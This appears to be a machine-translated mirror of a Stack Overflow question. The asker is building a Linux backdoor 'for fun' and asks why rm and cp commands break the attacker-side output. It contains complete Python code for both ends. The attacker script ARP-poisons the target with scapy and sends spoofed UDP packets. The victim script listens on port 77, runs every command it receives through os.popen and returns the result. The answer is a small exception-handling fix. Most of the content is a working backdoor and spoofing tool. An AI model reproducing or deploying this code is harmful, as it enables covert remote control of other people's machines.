堆栈内存溢出
  简体   繁体   English

如何在反向Shell中处理rm和cp命令

[英]How to handle rm and cp commands in a reverse shell

 原文  2018-03-25 21:19:37       python/ linux/ shell/ terminal/ scapy

问题描述

i'm creating a reverse shell for a linux backdoor for fun, and I got it working to a point. 我正在为Linux后门创建一个反向外壳,很有趣,但我确实做到了。 Most commands work like "cd", "ifconfig", and "ls". 大多数命令的工作方式类似于“ cd”,“ ifconfig”和“ ls”。 But commands like "cp" and "rm" work on the victim computer, but I don't get any output on my side (the attacker), I get this error when I try to "rm" or "cp": 但是像“ cp”和“ rm”之类的命令在受害计算机上可以运行,但我没有得到任何输出(攻击者),尝试“ rm”或“ cp”时会出现此错误:

在此处输入图片说明

Can you guys help me try and handle this? 你们可以帮我解决这个问题吗? I know cp doesn't actually output anything, and my program expects an output. 我知道cp实际上什么都不输出,我的程序期望输出。 Even though I get this error on my end, when I look at the victim I can still see the action (cp, or rm) go through. 即使我最终遇到此错误,当我看着受害者时,我仍然可以看到操作(cp或rm)正在进行。 Another alternative is whenever I get this error, I can get my program to just prompt for a command again. 另一个选择是,每当我收到此错误时,我都可以让我的程序再次提示输入命令。

Any help would be sick! 任何帮助都将不舒服!

Attacker code: 攻击者代码: 

import sys
import socket
import threading
import time
from logging import getLogger, ERROR
from scapy.all import *

getLogger('scapy.runtime').setLevel(ERROR)

try:
    victimIP = raw_input('Enter victim IP: ')
    spoofIP = raw_input('Enter IP you want to spoof: ')
    IF = raw_input('Enter network interface: ')
except KeyboardInterrupt:
    print '[!] User Interrupted Input'
    sys.exit(1)

conf.verb = 0

def getMAC():
    try:
        pkt = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = victimIP), timeout = 2, iface = IF, inter = 0.1)
    except Exception:
        print '[!] Failed to Resolve Victim MAC Address'
        sys.exit(1)
    for snd, rcv in pkt[0]:
        return rcv.sprintf(r"%Ether.src%")
print '\n[*] Resolving Victim MAC Address... '
victimMAC = getMAC()


spoofStatus = True
def poison():
    while 1:
        if spoofStatus == False:
            break
            return
        send(ARP(op=2, pdst=victimIP, psrc=spoofIP, hwdst=victimMAC))
        time.sleep(5)

print '\n[*] Starting Spoofer Thread...'
thread = []
try:
    poisonerThread = threading.Thread(target=poison)
    thread.append(poisonerThread)
    poisonerThread.start()
    print '[*] Thread Started Successfully\n'
except Exception:
    print '[!] Failed to Start Thread'
    sys.exit(1)

print 'Initializing connection with victim...'
pkt1 = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load='hello victim'))
pkt2 = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load='report'))

prompt = pkt2.getlayer(Raw).load

print 'Initialization Complete'
print '[*] Enter "goodbye" to Stop Connection\n'

while 1:
    command = raw_input(prompt)
    sendcom = sr1(IP(dst=victimIP, src=spoofIP)/UDP(sport=77, dport=77)/Raw(load=command))
    output = sendcom.getlayer(Raw).load
    if command.strip() == 'goodbye':
        print '\nGrabbing Threads...'
        spoofStatus = False
        poisonerThread.join()
        sys.exit(1)
    print output

Victim code: 受害者代码: 

import socket
import os
import sys
import platform

def launch():
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.bind(('', 77))
    launch = s.recvfrom(1024)
    addr = launch[1][0]
    port = launch[1][1]
    s.sendto('hello paul', (addr, port))
    return s, addr, port

s, addr, port = launch()

def getsysinfo():
    que = s.recvfrom(1024)
    prompt = []
    if que[1][0] == addr and que[1][1] == port:
        if os.getuid() == 0:
            prompt.append('root@')
            prompt.append('# ')
        else:
            prompt.append('user@')  
            prompt.append('$ ')
        prompt.insert(1, platform.dist()[0])
    s.sendto(''.join(prompt), (addr, port))
    return

getsysinfo()

def shell():
    while 1:
        try:
            command = s.recv(1024)
            if command.strip().split()[0] == 'cd':
                os.chdir(command.strip('cd '))
                s.sendto('Changed Directory', (addr, port))
            elif command.strip() == 'goodbye':
                s.sendto('Goodbye paul', (addr, port))
                s.close()
                break
            else:
                proc = os.popen(command)
                output = ''
                for i in proc.readlines():
                    output += i
                output = output.strip()
                s.sendto(output, (addr, port))
        except Exception:
            s.sendto('An unexpected error has occured', (addr, port))
            pass

shell()

1 个解决方案

解决方案1
 0  2018-03-27 00:23:49

I fixed it by adding this bit of code: 我通过添加以下代码来修复它: 

try:
    output = sendcom.getlayer(Raw).load
except AttributeError:
    continue

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 执行 shell 命令时如何处理随机字节流? - How to handle random bytestream when executing shell commands? 我正在用 Python 制作一个反向 shell 类型的程序,一些命令需要输入,我如何让它跳过这些命令? - I am making a reverse shell type program in Python, some commands need input, how do I make it skip those commands? 如何在反向 shell 中继续命令? - How to continue a command in a reverse shell? 如何在 IBM ILOG CPLEX CP Optimizer 中处理大整数? - How to handle large integers in IBM ILOG CPLEX CP Optimizer? 如何在 Python 反向 shell 中恢复 output - How to resume output in a Python reverse shell 如何与 python 中的脚本给出的反向 shell 交互? - How to interact with a reverse shell given by a script in python? 如何控制a.netcat反向shell与python - how to controll a netcat reverse shell with python 如何解决 JupyterNotebook 中此 Shell 命令的错误 - How to resolve the error of this Shell Commands in JupyterNotebook 如何在Python中转义ssh引用的shell命令 - How to escape ssh quoted shell commands in Python 如何将Python变量发送到Shell命令? - How to send a Python Variable to shell commands?
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM